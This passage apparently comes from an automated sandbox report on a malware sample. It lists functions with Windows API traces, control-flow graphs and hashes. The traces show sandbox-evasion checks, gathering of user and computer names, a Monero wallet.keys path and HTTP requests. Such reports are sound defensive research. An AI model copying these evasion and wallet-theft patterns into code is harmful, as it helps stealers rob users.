                                • Opcode Fuzzy Hash: 8599ea7f0d2c642b5800536f6b4adb774e3e36a82f3d4d471885a44fd19c5452
                                • Instruction Fuzzy Hash: AEE14272910104AACF18FBA0D9A3EEF73BDAF54300F449578B52676195EF316B48CB62
                                Function 00EB19F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1301 eb19f0-eb1a1d call ebade0 StrCmpCA 1304 eb1a1f-eb1a21 ExitProcess 1301->1304 1305 eb1a27-eb1a41 call ebade0 1301->1305 1309 eb1a44-eb1a48 1305->1309 1310 eb1a4e-eb1a61 1309->1310 1311 eb1c12-eb1c1d call ebab10 1309->1311 1313 eb1bee-eb1c0d 1310->1313 1314 eb1a67-eb1a6a 1310->1314 1313->1309 1316 eb1acf-eb1ae0 StrCmpCA 1314->1316 1317 eb1aad-eb1abe StrCmpCA 1314->1317 1318 eb1b63-eb1b74 StrCmpCA 1314->1318 1319 eb1b82-eb1b93 StrCmpCA 1314->1319 1320 eb1b41-eb1b52 StrCmpCA 1314->1320 1321 eb1ba1-eb1bb2 StrCmpCA 1314->1321 1322 eb1bc0-eb1bd1 StrCmpCA 1314->1322 1323 eb1a85-eb1a94 call ebab30 1314->1323 1324 eb1a99-eb1aa8 call ebab30 1314->1324 1325 eb1b1f-eb1b30 StrCmpCA 1314->1325 1326 eb1bdf-eb1be9 call ebab30 1314->1326 1327 eb1afd-eb1b0e StrCmpCA 1314->1327 1328 eb1a71-eb1a80 call ebab30 1314->1328 1344 eb1aee-eb1af1 1316->1344 1345 eb1ae2-eb1aec 1316->1345 1342 eb1aca 1317->1342 1343 eb1ac0-eb1ac3 1317->1343 1329 eb1b80 1318->1329 1330 eb1b76-eb1b79 1318->1330 1331 eb1b9f 1319->1331 1332 eb1b95-eb1b98 1319->1332 1350 eb1b5e 1320->1350 1351 eb1b54-eb1b57 1320->1351 1333 eb1bbe 1321->1333 1334 eb1bb4-eb1bb7 1321->1334 1336 eb1bdd 1322->1336 1337 eb1bd3-eb1bd6 1322->1337 1323->1313 1324->1313 1348 eb1b3c 1325->1348 1349 eb1b32-eb1b35 1325->1349 1326->1313 1346 eb1b1a 1327->1346 1347 eb1b10-eb1b13 1327->1347 1328->1313 1329->1313 1330->1329 1331->1313 1332->1331 1333->1313 1334->1333 1336->1313 1337->1336 1342->1313 1343->1342 1355 eb1af8 1344->1355 1345->1355 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 00EB1A15
                                • ExitProcess.KERNEL32 ref: 00EB1A21
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: c34a390b3b1219cbecb1786f9ffc53ed1f7cd4d5f963ba0e11897371d3bdfe8f
                                • Instruction ID: 9fe50e5deec89e2dcae5f2222c13ee9e5fda9e151b828515f86d27aee20d91e2
                                • Opcode Fuzzy Hash: c34a390b3b1219cbecb1786f9ffc53ed1f7cd4d5f963ba0e11897371d3bdfe8f
                                • Instruction Fuzzy Hash: AC513C75A04209EBCB14DF94DAA4FEF77B9EF44714F5054A8E812BB280E770EA41CB51
                                Function 00EB6C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF3150), ref: 00EB9BF1
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF31E0), ref: 00EB9C0A
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF3000), ref: 00EB9C22
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF30F0), ref: 00EB9C3A
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF30A8), ref: 00EB9C53
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF9E28), ref: 00EB9C6B
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BE5BB0), ref: 00EB9C83
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BE5B70), ref: 00EB9C9C
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF3048), ref: 00EB9CB4
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF3108), ref: 00EB9CCC
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF3018), ref: 00EB9CE5
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF3030), ref: 00EB9CFD
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BE5AD0), ref: 00EB9D15
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF3240), ref: 00EB9D2E
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EA11D0: ExitProcess.KERNEL32 ref: 00EA1211
                                  • Part of subcall function 00EA1160: GetSystemInfo.KERNEL32(?), ref: 00EA116A
                                  • Part of subcall function 00EA1160: ExitProcess.KERNEL32 ref: 00EA117E
                                  • Part of subcall function 00EA1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EA112B
                                  • Part of subcall function 00EA1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00EA1132
                                  • Part of subcall function 00EA1110: ExitProcess.KERNEL32 ref: 00EA1143
                                  • Part of subcall function 00EA1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EA123E
                                  • Part of subcall function 00EA1220: ExitProcess.KERNEL32 ref: 00EA1294
                                  • Part of subcall function 00EB6A10: GetUserDefaultLangID.KERNEL32 ref: 00EB6A14
                                  • Part of subcall function 00EA1190: ExitProcess.KERNEL32 ref: 00EA11C6
                                  • Part of subcall function 00EB79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EA11B7), ref: 00EB7A10
                                  • Part of subcall function 00EB79E0: RtlAllocateHeap.NTDLL(00000000), ref: 00EB7A17
                                  • Part of subcall function 00EB79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EB7A2F
                                  • Part of subcall function 00EB7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EB7AA0
                                  • Part of subcall function 00EB7A70: RtlAllocateHeap.NTDLL(00000000), ref: 00EB7AA7
                                  • Part of subcall function 00EB7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00EB7ABF
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01BF9DB8,?,00EC10F4,?,00000000,?,00EC10F8,?,00000000,00EC0AF3), ref: 00EB6D6A
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EB6D88
                                • CloseHandle.KERNEL32(00000000), ref: 00EB6D99
                                • Sleep.KERNEL32(00001770), ref: 00EB6DA4
                                • CloseHandle.KERNEL32(?,00000000,?,01BF9DB8,?,00EC10F4,?,00000000,?,00EC10F8,?,00000000,00EC0AF3), ref: 00EB6DBA
                                • ExitProcess.KERNEL32 ref: 00EB6DC2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2931873225-0
                                • Opcode ID: 71d76d088af8cf2b54b7bd9f390a5b5e82f4dbc7b2885b295a2c271c4dfb4c43
                                • Instruction ID: b251a6d11e34ca4d6790c3b32fb7ab64290db68f25bbd9d24dcd982acd16f83f
                                • Opcode Fuzzy Hash: 71d76d088af8cf2b54b7bd9f390a5b5e82f4dbc7b2885b295a2c271c4dfb4c43
                                • Instruction Fuzzy Hash: 7131FA31A10204AADF04F7E0D897BEF77B9AF54300F586978F12276182EF7469458BA2
                                Function 00EB6D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1436 eb6d93 1437 eb6daa 1436->1437 1439 eb6d5a-eb6d77 call ebade0 OpenEventA 1437->1439 1440 eb6dac-eb6dc2 call eb6bc0 call eb5d60 CloseHandle ExitProcess 1437->1440 1446 eb6d79-eb6d91 call ebade0 CreateEventA 1439->1446 1447 eb6d95-eb6da4 CloseHandle Sleep 1439->1447 1446->1440 1447->1437
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01BF9DB8,?,00EC10F4,?,00000000,?,00EC10F8,?,00000000,00EC0AF3), ref: 00EB6D6A
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EB6D88
                                • CloseHandle.KERNEL32(00000000), ref: 00EB6D99
                                • Sleep.KERNEL32(00001770), ref: 00EB6DA4
                                • CloseHandle.KERNEL32(?,00000000,?,01BF9DB8,?,00EC10F4,?,00000000,?,00EC10F8,?,00000000,00EC0AF3), ref: 00EB6DBA
                                • ExitProcess.KERNEL32 ref: 00EB6DC2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: 0c8a062e690da293c28f855c9d6998a87f007f0d0f26c07becef762ac4c2fbb9
                                • Instruction ID: 2ea10f9427571b6168066df0d7d4e9ba4c0ff0aa32240fc14953c90e0ddd1dac
                                • Opcode Fuzzy Hash: 0c8a062e690da293c28f855c9d6998a87f007f0d0f26c07becef762ac4c2fbb9
                                • Instruction Fuzzy Hash: 0DF05830A44209ABEF24BBA0EC0ABFF33B4AF04705F142935F622B52C4CBB45540CBA1
                                Function 00EA4800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EA4889
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00EA4899
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: 53e8b5d1ed08c606de41d1c28f0ede9c5f52086e6dc4d1341cc0206bdeb1c2eb
                                • Instruction ID: 107f3ac1edca3fd1b438ef42b2e74863775ab40b01468a689db85bba1b29d582
                                • Opcode Fuzzy Hash: 53e8b5d1ed08c606de41d1c28f0ede9c5f52086e6dc4d1341cc0206bdeb1c2eb
                                • Instruction Fuzzy Hash: D2211FB1D00209ABDF14DFA4E845ADE7BB5FB45321F148625F925B72C0DB706A05CF91
                                Function 00EB5440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                  • Part of subcall function 00EA62D0: InternetOpenA.WININET(00EC0DFF,00000001,00000000,00000000,00000000), ref: 00EA6331
                                  • Part of subcall function 00EA62D0: StrCmpCA.SHLWAPI(?,01BFF7D0), ref: 00EA6353
                                  • Part of subcall function 00EA62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EA6385
                                  • Part of subcall function 00EA62D0: HttpOpenRequestA.WININET(00000000,GET,?,01BFF220,00000000,00000000,00400100,00000000), ref: 00EA63D5
                                  • Part of subcall function 00EA62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EA640F
                                  • Part of subcall function 00EA62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EA6421
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EB5478
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: bce14c8951fd7aefa14c10fd0c49c5f719be267d7d41eb62db877d4c9b473718
                                • Instruction ID: 0f3a818355827205b56ad764187950be41e5348766fd16f65252b329d19b6aea
                                • Opcode Fuzzy Hash: bce14c8951fd7aefa14c10fd0c49c5f719be267d7d41eb62db877d4c9b473718
                                • Instruction Fuzzy Hash: 4411EF31910108AACF14FF64D992AEE73B99F54340F445578E91A7A592EB30AB05C691
                                Function 00EA1220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1493 ea1220-ea1247 call eb8b40 GlobalMemoryStatusEx 1496 ea1249-ea1271 call ebdd30 * 2 1493->1496 1497 ea1273-ea127a 1493->1497 1498 ea1281-ea1285 1496->1498 1497->1498 1500 ea129a-ea129d 1498->1500 1501 ea1287 1498->1501 1503 ea1289-ea1290 1501->1503 1504 ea1292-ea1294 ExitProcess 1501->1504 1503->1500 1503->1504
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EA123E
                                • ExitProcess.KERNEL32 ref: 00EA1294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: 924c4949ada31f3684270fe38c3f077e3d72c9f7691d4f941d2c45842662c67c
                                • Instruction ID: 87cedb9a619a2198a6b1f4fb33b7417040aedc8abed72fea1676411e51ea7a86
                                • Opcode Fuzzy Hash: 924c4949ada31f3684270fe38c3f077e3d72c9f7691d4f941d2c45842662c67c
                                • Instruction Fuzzy Hash: 850162B0D44308BAEF10DFE0DD4AB9EB7B8EB14705F145498E604BA2D0D674A5419769
                                Function 00EB7A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EB7AA0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB7AA7
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 00EB7ABF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 9702e4e9ed714b10dc46a1fd0e2e8396b54d1b26aea42497f1d955a962e0a22c
                                • Instruction ID: 11ebe3a871f870b6a50bd6bbb8e1027f4a369ed7f6762d32d6a35f3664ba7317
                                • Opcode Fuzzy Hash: 9702e4e9ed714b10dc46a1fd0e2e8396b54d1b26aea42497f1d955a962e0a22c
                                • Instruction Fuzzy Hash: BF01ADB1A08309ABC714CF88D949BEFBBB8FB44710F10022AF551F2780D7B45A008BA1
                                Function 00EA1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EA112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00EA1132
                                • ExitProcess.KERNEL32 ref: 00EA1143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
